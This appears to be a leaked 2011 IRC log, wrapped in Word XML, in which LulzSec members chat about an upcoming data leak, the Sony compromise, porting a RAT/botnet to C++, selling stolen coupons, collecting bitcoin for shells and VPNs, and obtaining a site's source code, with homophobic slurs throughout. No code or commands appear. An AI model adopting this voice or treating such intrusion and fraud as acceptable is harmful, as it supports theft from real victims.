      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:37:43 kl0ps whats new? i wanna hug u :D Jun 02 14:37:54 * lol gives channel operator status to kl0ps pwnsauce Jun 02 14:38:18 lol \:D/ Jun 02 14:38:35 kl0ps \o/ Jun 02 14:39:42 pwnsauce hey there :D Jun 02 14:39:58 pwnsauce kl0ps... where does I know you from?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:00 pwnsauce BTW Jun 02 14:40:17 lol kl0ps is from #internetfeds :D Jun 02 14:40:22 pwnsauce Ah!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:26 Topiary pwnsauce Jun 02 14:40:26 pwnsauce Now I remember!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:28 kl0ps yeah :D Jun 02 14:40:34 pwnsauce S'up Topiary!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:36 pwnsauce BTW Jun 02 14:40:36 Topiary http://lulzsecurity.com/ Jun 02 14:40:39 Topiary let it flow Jun 02 14:40:41 Topiary it tflows back to you Jun 02 14:40:41 pwnsauce Onesecc :D Jun 02 14:41:02 pwnsauce Onesec im Whoissing that lol Jun 02 14:41:07 pwnsauce ill flip if my d0x are on it Jun 02 14:41:12 joepie92 FUCKING lold @ pastebin tweet Jun 02 14:41:20 Topiary haha yep Jun 02 14:41:24 joepie92 "ohey we don't care you put illegal shit on our servers lol" Jun 02 14:41:32 Topiary they really don't give a fuck Jun 02 14:41:34 joepie92 ahaha Jun 02 14:41:40 joepie92 be aware that ryan has admin thar though Jun 02 14:41:42 joepie92 :P Jun 02 14:41:46 Topiary oh lordy Jun 02 14:41:56 joepie92 on the other hand Jun 02 14:42:02 joepie92 he's probably minecrafting Jun 02 14:42:23 pwnsauce LMAO!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:42:29 pwnsauce BTW Guys Jun 02 14:42:43 pwnsauce I need a good coder, who writes in C++ and understands VB.NET Jun 02 14:42:55 pwnsauce one who is careful and is willing to help on a project for us Jun 02 14:43:01 pwnsauce PHP skills are a bonus Jun 02 14:43:25 pwnsauce I have a VB.net RAT/botnet here, I need to modify it, improve it, and turn it into C++ Jun 02 14:43:40 pwnsauce for a little idea I had that I need to talk to Sabu about Jun 02 14:43:58 Topiary &lt;prosi&gt; hey sir, are you there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:43:58 Topiary &lt;whirlpool&gt; word ninja Jun 02 14:43:58 Topiary &lt;prosi&gt; I respect you guys a lot and I don't want to hide anything to you Jun 02 14:43:58 Topiary &lt;prosi&gt; &gt;.&gt; Jun 02 14:43:58 Topiary &lt;prosi&gt; so I'm telling you this Jun 02 14:43:58 Topiary &lt;prosi&gt; I'm one of them faggot anonymous, atleast I do the propaganda part for them Jun 02 14:44:02 joepie92 I understand VB.net but don't write C++ Jun 02 14:44:02 Topiary &lt;prosi&gt; but I'm no hacker n shit Jun 02 14:44:04 Topiary &lt;prosi&gt; : Jun 02 14:44:26 pwnsauce joepie92 - :D now we need the C++ guy!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:44:29 joepie92 lol Jun 02 14:44:33 joepie92 tbh Jun 02 14:44:37 joepie92 anything you could write in vb.net Jun 02 14:44:42 joepie92 would probably be just as easy to replicate in C++ Jun 02 14:44:45 joepie92 as without an example Jun 02 14:44:53 joepie92 -as Jun 02 14:45:21 joepie92 why am I 92 again Jun 02 14:45:22 joepie92 o_O Jun 02 14:45:24 * joepie92 is now known as joepie91 Jun 02 14:45:39 pwnsauce hmmmmm. thing is, it aint my code im playing with. its just ecode to use as a "base" Jun 02 14:45:46 Topiary Jester = milw0rm + slowloris + Tor, Python = VB.net + JS, joepie91 + cage = gorilla habitat Jun 02 14:46:07 joepie91 lolwat Jun 02 14:46:13 joepie91 that actually took me some time to interpret Jun 02 14:46:30 pwnsauce lolwtfbbq?!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:47:00 joepie91 k guys, I have to work on interpreting Iran emails for a bit Jun 02 14:47:02 * joepie91 brb Jun 02 14:47:14 pwnsauce kk Jun 02 14:47:29 pwnsauce kayla - if you or kl0ps know anyone...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:47:32 Topiary Whirlpool&gt; that's cool, how are things going over at Anon?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:47:32 Topiary &lt;prosi&gt; it's all slow n shit. you are under the spot light these days.. lol so we are keeping it down Jun 02 14:47:32 Topiary &lt;prosi&gt; but greece fags are trying to attack IMF Jun 02 14:47:32 Topiary &lt;prosi&gt; that's all Jun 02 14:47:32 Topiary &lt;prosi&gt; :) Jun 02 14:47:32 Topiary &lt;whirlpool&gt; I hear you guys hacked HBGary Jun 02 14:47:41 * Topiary waits for something no doubt lulzy Jun 02 14:47:51 pwnsauce xD Jun 02 14:48:08 kl0ps i am sry :( Jun 02 14:48:11 Topiary &lt;prosi&gt; yeah.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:08:55 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Thu Jun 2 15:08:55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15:15:22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15:15:22 * Now talking on #pure-elite Jun 02 15:15:22 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 15:15:22 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 15:15:39 Recursion hey, when is the leak going to hit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:15:46 neuron l2 hours Jun 02 15:15:57 * Recursion giggles with anticipation Jun 02 15:15:57 Recursion awww Jun 02 15:30:40 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Thu Jun 2 15:30:40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15:34:10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15:34:10 * Now talking on #pure-elite Jun 02 15:34:10 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 15:34:10 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 15:35:09 joepie91 ye Jun 02 15:35:10 joepie91 I lold Jun 02 15:35:14 joepie91 pastebin is like Jun 02 15:35:16 joepie91 TRAFFIC NOM Jun 02 15:35:21 trollpoll hahahah Jun 02 15:35:28 trollpoll they love lulz xD Jun 02 15:35:36 joepie91 and traffic Jun 02 15:35:39 joepie91 especially traffic Jun 02 15:35:42 trollpoll sure Jun 02 15:35:45 joepie91 srsly, the owner of pastebin is just as bad as ryan Jun 02 15:35:45 joepie91 in that Jun 02 15:35:51 trollpoll ahahha Jun 02 15:35:53 joepie91 traffic nom nom nom Jun 02 15:36:06 trollpoll r u at 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:36:10 joepie91 I am, I am Jun 02 15:36:16 trollpoll how is the chan now?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:36:22 trollpoll hundreds?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:36:32 joepie91 110 Jun 02 15:36:35 trollpoll omg Jun 02 15:36:47 trollpoll im going as "arrrrr" Jun 02 15:36:49 joepie91 inb4 opers mad Jun 02 15:36:50 joepie91 lolk Jun 02 15:37:13 neuron joinin 2600!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:39:37 neuron op captainjack Jun 02 15:41:01 joepie91 &lt;whirlpool&gt;this channel is more successful than 2600 itself Jun 02 15:41:03 joepie91 I think Jun 02 15:41:05 joepie91 that is the only reason Jun 02 15:41:09 joepie91 we haven't been booted yet Jun 02 15:41:11 joepie91 from 2600 Jun 02 15:41:11 joepie91 lol Jun 02 15:41:15 trollpoll hahaha Jun 02 15:41:21 joepie91 TRAFFIC NOM Jun 02 15:41:22 joepie91 lol Jun 02 15:41:26 neuron op CaptainJack! :P Jun 02 15:47:18 sabu 2600 liks them sex Jun 02 15:47:32 neuron lol yup Jun 02 15:52:11 &lt;hsien&gt; how many people are there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:52:30 neuron 114 Jun 02 15:52:33 neuron join the lulz Jun 02 15:52:36 neuron pick a pirate name Jun 02 15:55:15 joepie91 I'm sort of tempted Jun 02 15:55:17 joepie91 to pick a pirate name Jun 02 15:55:22 joepie91 but that might blow a potential cover Jun 02 15:55:22 joepie91 lol Jun 02 15:56:49 &lt;hsien&gt; lol k can i be johnny depp?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:57:02 &lt;hsien&gt; hes a pirate right?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:58:27 trollpoll i have a very good name of pirate Jun 02 15:58:28 trollpoll Jammie Thomas-Rasset Jun 02 15:58:30 trollpoll xDDDDD Jun 02 15:58:51 Recursion who the fuck is ShadowDXS?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:59:09 neuron guy from anonops hes cool Jun 02 15:59:23 joepie91 mk Jun 02 15:59:24 Recursion ok Jun 02 15:59:24 Recursion lol Jun 02 15:59:29 joepie91 I estimate to have dinged a few xchat clients Jun 02 15:59:31 joepie91 with that bell character Jun 02 15:59:32 joepie91 :D Jun 02 16:03:12 neuron how long till drop?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:05:18 neuron make sure to post your bitcoin address to :P Jun 02 16:11:24 trollpoll btw Jun 02 16:11:40 trollpoll did you read the NATO doc about anonymous? Jun 02 16:11:51 trollpoll they will put tanks on our houses????</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:12:14 trollpoll http://www.thinq.co.uk/2011/6/1/nato-report- threatens-persecute-anonymous/ Jun 02 16:12:26 neuron lol Jun 02 16:15:00 joepie91 lol Jun 02 16:15:03 joepie91 post bitcoin address Jun 02 16:15:03 joepie91 kgo Jun 02 16:15:08 joepie91 in #lulzsec Jun 02 16:15:14 joepie91 Topiary Jun 02 16:15:15 joepie91 fgt Jun 02 16:15:20 joepie91 post bitcoin address kgo Jun 02 16:16:38 Topiary okay Jun 02 16:16:54 neuron we need pastehtml and pastebin single leaks :D Jun 02 16:17:37 [redacted] they will put tanks in our houses Jun 02 16:17:43 [redacted] we will put penis's in their mouths Jun 02 16:18:26 lol Obama will be like "lol you just ddos my server?" *nuke* Jun 02 16:22:17 pwnsauce LOL Jun 02 16:22:33 joepie91 just wondering Jun 02 16:22:34 joepie91 is that data Jun 02 16:22:36 joepie91 actual PSN data?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:22:56 joepie91 because I thought the web services were decoupled from PSN Jun 02 16:23:06 trollpoll guys, you are epic Jun 02 16:27:22 neuron did someone post a bitcoin address?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:27:25 joepie91 is "kardus" one of you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:27:27 joepie91 and no, noone did Jun 02 16:27:28 joepie91 -_- Jun 02 16:27:31 neuron joepie91: Jun 02 16:27:33 neuron post Jun 02 16:27:33 neuron :P Jun 02 16:27:36 neuron or i will Jun 02 16:27:38 joepie91 lemme make an address Jun 02 16:27:41 neuron kk Jun 02 16:27:42 Recursion http://www.reddit.com/r/netsec/comments/hq6xq/lulzsec_compromises_sony_again_twitter/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16:27:43 Recursion :D Jun 02 16:27:48 neuron lmfao Jun 02 16:27:53 joepie91 1BUYwuagdWXnvBaPdTmu25cztifFLAJHXw Jun 02 16:27:55 joepie91 kgo Jun 02 16:28:03 Recursion I know a kardus....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:28:03 joepie91 look at it in blockexplorer to see how much you got Jun 02 16:28:04 joepie91 :D Jun 02 16:28:16 Recursion from partyvan.fm Jun 02 16:28:19 Recursion like, years ago Jun 02 16:29:23 neuron joepie91: there you go people are starting to donate Jun 02 16:29:42 joepie91 seeing first one Jun 02 16:29:57 neuron joepie91: we will use whatevers donated for shells or some shit. or send them to sabu for later use Jun 02 16:30:08 joepie91 ya Jun 02 16:30:11 joepie91 I'll forward all of it Jun 02 16:30:13 joepie91 to one of you guys Jun 02 16:30:28 joepie91 or Topiary or sth Jun 02 16:30:32 joepie91 I think he did bitcoin stuff Jun 02 16:30:33 joepie91 so far Jun 02 16:31:05 neuron yeah Jun 02 16:31:59 neuron Sabu: Op me so i can get donations plox Jun 02 16:32:26 Topiary 1Ahou81cHECe2nBWYSAiwbCMg5aQB9Gh2a Jun 02 16:32:30 Topiary is our bitcoin Jun 02 16:33:10 neuron whoop late for that Jun 02 16:33:22 neuron Topiary: loging and op and post it Jun 02 16:33:37 joepie91 I'll forward the 0.04 Jun 02 16:33:38 joepie91 1 sec Jun 02 16:33:39 neuron Op me if you can Jun 02 16:34:01 joepie91 Topiary, the 0.04 that came in on my address is coming your way :P Jun 02 16:34:11 sabu hopefully we get some good donations Jun 02 16:34:16 sabu so we can buy more vpns and shit Jun 02 16:34:24 neuron yup Jun 02 16:34:24 joepie91 be sure to op all lulzsec people Jun 02 16:34:25 neuron \o/ Jun 02 16:34:27 joepie91 in #lulzsec Jun 02 16:34:28 Topiary oh lawdy Jun 02 16:34:35 joepie91 prevents confusion Jun 02 16:34:38 neuron yeah its kinda hard when people are pming asking why your not opped :P Jun 02 16:34:38 Topiary okay call yourselves out with "scurvy" right now Jun 02 16:34:50 sabu no one talk in 2600 just focus here Jun 02 16:34:53 sabu let everyone go crazy Jun 02 16:35:24 * Recursion_ (gibby@HA-b7o.3p2.0g9blo.IP) has joined #pure- elite Jun 02 16:35:30 &lt;recursion_&gt; thats weird Jun 02 16:35:40 &lt;recursion_&gt; hey, Sabu, or an IRC op Jun 02 16:35:48 &lt;recursion_&gt; can you /kill Recursion Jun 02 16:35:49 neuron haha Sabu hows the traffic?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:36:21 joepie91 &lt;kardus&gt;implying they aren't already shitting houses from the last 10 sites compromised ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:36:21 joepie91 &lt;kardus&gt;with another 2 about to be released soon? Jun 02 16:36:21 joepie91 &lt;kardus&gt;:P Jun 02 16:36:34 joepie91 &lt;kardus&gt;didn't even find out where to use the coupons yet Jun 02 16:36:34 joepie91 &lt;kardus&gt;didn't work with their music store or their amazon link thing Jun 02 16:36:51 joepie91 &lt;kardus&gt;they are valid coupons, it checks against the amazon database and says it's valid, they just dont work for some reason Jun 02 16:36:52 joepie91 &lt;kardus&gt;nah Jun 02 16:36:52 joepie91 &lt;kardus&gt;tried a week ago Jun 02 16:36:52 joepie91 &lt;sanchaz&gt;kardus: was this realeased a week ago? Jun 02 16:36:52 joepie91 &lt;kardus&gt;and while the db was being dumped new entries were being added Jun 02 16:36:52 joepie91 &lt;kardus&gt;nope Jun 02 16:36:52 joepie91 &lt;kardus&gt;well, not to the public Jun 02 16:37:07 joepie91 &lt;sanchaz&gt;u part of lulz?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:37:08 joepie91 &lt;kardus&gt;i'm neither here nor there Jun 02 16:37:08 joepie91 &lt;kardus&gt;sir Jun 02 16:37:24 neuron who is kardus?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:37:37 trollpoll and where is talking?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:38:22 joepie91 #Frantech Jun 02 16:38:23 joepie91 on dairc Jun 02 16:38:31 joepie91 I am wondering who he is too Jun 02 16:38:37 joepie91 Sabu ding Jun 02 16:38:39 sabu hi Jun 02 16:38:42 joepie91 read above Jun 02 16:38:52 sabu I think thats kaylas friend she gave someone some coupons Jun 02 16:39:00 sabu if hes talking publicly Jun 02 16:39:04 sabu kayla will talk to him Jun 02 16:39:17 joepie91 it's #Frantech Jun 02 16:39:19 joepie91 on Dairc Jun 02 16:39:22 joepie91 aka buyvm Jun 02 16:39:31 sabu aka kayla/lol and paste her log Jun 02 16:39:34 sabu if its her friend Jun 02 16:39:47 trollpoll hmm... guys you are everywhere.. :S Jun 02 16:39:48 &lt;recursion_&gt; Sabu: are you an IRCop?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:39:58 * joepie91 doubts she has "lol" on highlight Jun 02 16:40:03 &lt;recursion_&gt; lol Jun 02 16:40:07 &lt;recursion_&gt; &gt;.&gt; Jun 02 16:40:16 joepie91 trollpoll: I am connected to like 13 networks atm Jun 02 16:40:21 &lt;recursion_&gt; also, joepie91, where is Kardus? Jun 02 16:40:24 trollpoll omg Jun 02 16:40:30 &lt;recursion_&gt; err Jun 02 16:40:30 joepie91 sometimes up to 25 networks Jun 02 16:40:31 Topiary http://twitter.com/#!/aaronbarr/status/76387343350759424 Jun 02 16:40:34 &lt;recursion_&gt; joepie91: rather Jun 02 16:40:37 joepie91 I tend to keep an eye on channels everywhere Jun 02 16:40:38 trollpoll do you have 6 hands?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:40:40 joepie91 lol Jun 02 16:40:43 joepie91 I just have a good client :) Jun 02 16:41:11 * joepie91 lols at aaron barr tweet Jun 02 16:41:24 trollpoll Neuron, im jt-rasset XD Jun 02 16:41:50 joepie91 Recursion Jun 02 16:41:54 joepie91 dairc Jun 02 16:41:57 joepie91 #frantech Jun 02 16:42:00 joepie91 the buyvm/frantech channel Jun 02 16:42:05 joepie91 irc.dairc.net Jun 02 16:42:34 neuron talking to a member in there Jun 02 16:42:46 neuron who claims to ahve secdev.net's source code hes donating under the condition it never goes public Jun 02 16:42:59 &lt;recursion_&gt; tell him an IRC op from partyvan says hello Jun 02 16:43:00 &lt;recursion_&gt; :P Jun 02 16:44:02 sabu hahhahhahahahah Jun 02 16:44:08 sabu aaron barr tweeted Jun 02 16:44:09 sabu oh man Jun 02 16:44:12 joepie91 btw, http://anonbooks.strangled.net/File%20Mirrors/ Jun 02 16:44:17 joepie91 got the .tar.bz2 there Jun 02 16:44:20 joepie91 it's not going anywhere Jun 02 16:44:21 joepie91 :) Jun 02 16:44:29 joepie91 so feel free to link if needed Jun 02 16:44:32 Topiary 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 16:44:35 Topiary that's our new one by the way Jun 02 16:44:42 Topiary I accidentally hit F5 and it generated a new one Jun 02 16:44:57 lol yeh he's the guy who was testing the coupons when i said we could get them sold he was going to sell them for us and i gave him some to test Jun 02 16:44:57 lol i even mentioned it here :D Jun 02 16:45:11 neuron ahh ok Jun 02 16:45:51 joepie91 Topiary: you using a web wallet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:46:06 joepie91 lol: ah, might be better to not have him talking about it in public though, lol Jun 02 16:46:12 joepie91 *especially* not in #Frantech Jun 02 16:46:24 Topiary yeah web wallet Jun 02 16:46:33 lol yeh :D Jun 02 16:46:46 joepie91 http://webcache.googleusercontent.com/search?q=cache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&amp;hl=en&amp;strip=1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16:46:51 &lt;recursion_&gt; jesus, is that kid still in the hospital? Jun 02 16:46:56 joepie91 this was just posted in #Frantech Jun 02 16:46:57 lol but it's technically on his own back because he knows no one in this channel :P Jun 02 16:46:58 lol he got them from me Jun 02 16:47:06 &lt;recursion_&gt; I think he managed to put IRSSI on his heart monitor or something Jun 02 16:47:06 joepie91 &lt;vld&gt;http://webcache.googleusercontent.com/search?q=cache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&amp;hl=en&amp;strip=1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16:47:07 joepie91 &lt;vld&gt;ewww Jun 02 16:47:13 joepie91 it's a sales thread for the coupons...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:47:23 joepie91 Recursion_: who?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:47:54 &lt;recursion_&gt; Kardus Jun 02 16:47:54 &lt;recursion_&gt; lol Jun 02 16:48:20 neuron Sabu: im getting the http://secdev.net code Jun 02 16:48:40 joepie91 idk who he is Jun 02 16:48:40 joepie91 lol Jun 02 16:48:49 &lt;recursion_&gt; I used to have DOX on him Jun 02 16:48:51 neuron ill verify Jun 02 16:48:52 * Recursion_ shrugs Jun 02 16:49:00 sabu ok Jun 02 16:49:05 sabu guys Jun 02 16:49:07 sabu neruon etc Jun 02 16:49:10 &lt;recursion_&gt; whaddap?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
